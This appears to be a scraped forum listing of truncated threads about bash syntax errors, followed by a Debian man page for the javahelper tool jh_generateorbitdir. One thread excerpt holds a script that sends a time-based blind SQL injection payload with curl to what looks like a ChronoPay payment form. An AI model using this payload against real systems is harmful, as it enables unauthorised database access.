I have 2 files like a.txt and b.txt and the content is as below
I am using below command to get the difference after sorting both the files,
but i am getting syntax error near unexpected token `('
Please help
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I'm getting the following error:
line 21: syntax error near unexpected token `done`
line 21: `done`
and I haven't been able to figure out why.
Here is my code
#!/bin/sh
if ; then
echo 'Usage: rename getexp/replStr '
exit 0
fi
arg = $1
shift
while ; do (5 Replies)
Guys ,
This is an output of my script errored out for "Syntax error near unexpected token `(' " Can someone tell me whats wrong with my script.
Below is my original script pasted.
#!/bin/bash
Script Creation Date 01/21/2010
Author baraghun
... (7 Replies)
Hi,
I am running the following script through cygwin and getting below mentioned error.
*******************************************
#!/bin/sh
# constants
WORK_DIR="deploy"
INFOFILE="deploy.info"
INTROFILE="Intro.sh"
CMGMT_PKG="com.kintana.cmgmt.deploy"
DEPLOY_PREFIX="mitg"
... (2 Replies)
Hi all,
This is a script which converts hex to bin. However am finding an error while executing
syntax error near unexpected token `='
`($hexfile, $binfile) = @ARGV;'
I am running using ./fil.pl <hexfile> <binfile>
###################################################
#
# this script... (3 Replies)
What do I do here?
#!/bin/bash
payload=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#
hash=`echo -n $payload md5sum tr -d 'n' sed 'ss-sg' md5sum tr -d 'n' sed 'ss-sg'`
curl --data cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill... (2 Replies)
Hi,
I am trying to read the session log through script. But it keeps showing me some error near. I have tried everything. Even tried converting the script using sed command to remove the hidden characters(\r).But nothing seems to be working.Below is the script :
#!/bin/bash
cd... (6 Replies)
I tried to execute the code but I got this error
./Array.c: line 9: syntax error near unexpected token '('
./Array.c: line 9: ' nvals = get_data(a,MAXARRAY);'
and
#include<stdio.h>
#define MAXARRAY 1000
main()
{
int a,
nvals;
nvals =... (7 Replies)
Hi all,
I have a simple script that doesn't work somehow. I can't seem to be spotting the cause of the malfunction.
count=$((1))
for item in `cat test1.txt`
printf %s `sed -n $((count))p test2.txt` > test3.txt
count=$((count+1))
do
something
done
I get ;
./why.sh: line 3:... (14 Replies)
Dears,
While executing the below script im getting the error at line 30. Please let me know what changes to be done to fix this.
test.sh: line 30: syntax error near unexpected token `done'
test.sh: line 30: ` done '
#!/bin/sh
# Rev. PA1
# author: eillops
# date: 26-04-2018
#
#... (1 Reply)
detect_mouse_mvt.sh
/home/andy/bin/detect_mouse_mvt.sh: line 4: syntax error near unexpected token `('
/home/andy/bin/detect_mouse_mvt.sh: line 4: `fh = file('/dev/input/mice')'
#!/bin/bash
#
#
fh = file('/dev/input/mice')
while True:
fh.read(3)
print 'Mouse... (15 Replies)
Discussion started by: drew77
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LEARN ABOUT DEBIAN
jh_generateorbitdir
JH_GENERATEORBITDIR(1) Javahelper JH_GENERATEORBITDIR(1)NAME
jh_generateorbitdir - Creates and populates an orbit dir used by pde-build for third-party jar files.
SYNOPSIS
jh_generateorbitdir [debhelperoptions] [--orbit-dir=dir] [orbit-dep[...]]
DESCRIPTION
jh_generateorbitdir is a javahelper program that handles creation of an orbit dependency dir. This directory has to be populated with non-
eclipse jar files. However, eclipse refers to these jars by their "symbolic name". jh_generateorbitdir can extract this name from the jar's
manifest (provided it has the OSGi metadata) and create a symlink to it.
jh_generateorbitdir will replace regular files with symlinks if they are present in the orbit dir and clash with the name of one of the
orbit jars. If an orbit jar name clashes with a symlink in the orbit dir, then jh_generateorbitdir will assume that the given jar has
already been symlinked correctly. In this case the jar file is still recorded in the cache (see below).
jh_generateorbitdir will also check the default installation for jar files on Debian systems (at the time of writing /usr/share/java), if
it cannot find the jar in the current dir.
Jar files replaced by jh_generateorbitdir will be recorded so that jh_installeclipse can replace with symlinks them post install.
FILES
debian/eclipse.orbitdeps
List of orbit dependencies - one per line. This can be used as an alternative to passing it per command line.
OPTIONS --orbit-dir=dir
Specifies the directory from where the orbit-dir is or should be created. Defauls to "debian/.eclipse_build/orbitdeps".
EXAMPLE
jh_generateorbitdir --orbit-dir orbit asm3 oro
Will generate a folder called orbit with two symlinks based on asm3 and oro's symbolic name.
SEE ALSO debhelper(7)
This program is a part of javahelper and uses debhelper as backend. There are also tutorials in /usr/share/doc/javahelper.
AUTHOR
Niels Thykier <niels@thykier.net>
COPYRIGHT AND LICENSE
Copyright 2010 by Niels Thykier
This tool is free software; you may redistribute it and/or modify it under the terms of GNU GPL 2.
0.43 2011-04-29 JH_GENERATEORBITDIR(1)